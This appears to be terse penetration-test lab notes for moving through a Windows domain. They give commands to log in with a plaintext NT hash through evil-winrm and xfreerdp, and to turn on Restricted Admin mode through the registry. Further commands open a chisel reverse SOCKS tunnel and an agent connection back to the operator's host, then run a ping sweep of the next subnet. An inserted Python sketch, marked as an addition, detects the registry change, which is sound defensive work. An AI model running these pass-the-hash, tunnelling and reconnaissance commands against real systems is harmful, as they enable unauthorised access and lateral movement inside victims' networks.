Evil-winrm setup to get rdp
proxychains evil-winrm -i 172.16.1.5 -u 'iamtheadministrator' -H 70016778cb0524c799ac25b439bd67e0 /domain:corp.local
Removing Admins Restriction
powershell reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
RDP
proxychains xfreerdp /u:iamtheadministrator /pth:70016778cb0524c799ac25b439bd67e0 /v:172.16.1.5
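Detection side of the registry change above, as an added example (not part of the original notes): setting DisableRestrictedAdmin to 0 turns on Restricted Admin mode, which is what allows an RDP logon with only an NT hash. The sketch flags that write in Sysmon-style events. The event dictionaries, host names and the `findings` helper are constructed for illustration.

```python
import re

# Registry value written by the `reg add` line in the notes.
VALUE_RE = re.compile(r"\\Control\\Lsa\\DisableRestrictedAdmin$", re.IGNORECASE)
CMD_RE = re.compile(r"\breg(\.exe)?\b.*\badd\b.*DisableRestrictedAdmin", re.IGNORECASE)

# Constructed sample events shaped like Sysmon ID 13 (registry value set)
# and ID 1 (process creation). Host names are made up.
LSA = r"HKLM\System\CurrentControlSet\Control\Lsa"
SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "HOST-A",
     "TargetObject": LSA + r"\DisableRestrictedAdmin", "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Computer": "HOST-A",
     "TargetObject": LSA + r"\LimitBlankPasswordUse", "Details": "DWORD (0x00000001)"},
    {"EventID": 1, "Computer": "HOST-A",
     "CommandLine": "reg add " + LSA + " /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f"},
    {"EventID": 13, "Computer": "HOST-B",
     "TargetObject": LSA + r"\DisableRestrictedAdmin", "Details": "DWORD (0x00000001)"},
]

def parse_dword(details):
    """Extract the integer from a Sysmon 'DWORD (0x...)' Details string."""
    m = re.search(r"DWORD \((0x[0-9a-fA-F]+)\)", details or "")
    return int(m.group(1), 16) if m else None

def parse_cmd_data(cmdline):
    """Extract the /d argument of a reg add command line as an integer."""
    m = re.search(r"/d\s+(\S+)", cmdline, re.IGNORECASE)
    try:
        return int(m.group(1), 0) if m else None
    except ValueError:
        return None

def findings(events):
    """Return (host, source, value, severity) for every touch of the value."""
    out = []
    for ev in events:
        if ev.get("EventID") == 13 and VALUE_RE.search(ev.get("TargetObject", "")):
            source, value = "registry", parse_dword(ev.get("Details"))
        elif ev.get("EventID") == 1 and CMD_RE.search(ev.get("CommandLine", "")):
            source, value = "cmdline", parse_cmd_data(ev["CommandLine"])
        else:
            continue
        # 0 enables Restricted Admin mode; other values are logged as changes only.
        out.append((ev["Computer"], source, value, "high" if value == 0 else "info"))
    return out

if __name__ == "__main__":
    for hit in findings(SAMPLE_EVENTS):
        print(hit)
```

A "high" hit followed by an inbound RDP logon to the same host is the sequence worth correlating.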
./chiselj server -p 8004 --reverse
Powershell
Set-ExecutionPolicy Unrestricted
.\chiselj.exe client 10.10.15.211:8004 R:5000:socks
.\agent.exe -connect 10.10.15.211:11601 -ignore-cert
#Disconnect
DC02 connection with proxychains
- Go to the DC02 folder, as the proxychains files with port 5000 are there.
Ping Sweep
1..256 | % {"172.16.2.$($_): $(Test-Connection -count 1 -comp 172.16.2.$($_) -quiet)"}
Results
.22 is the new ip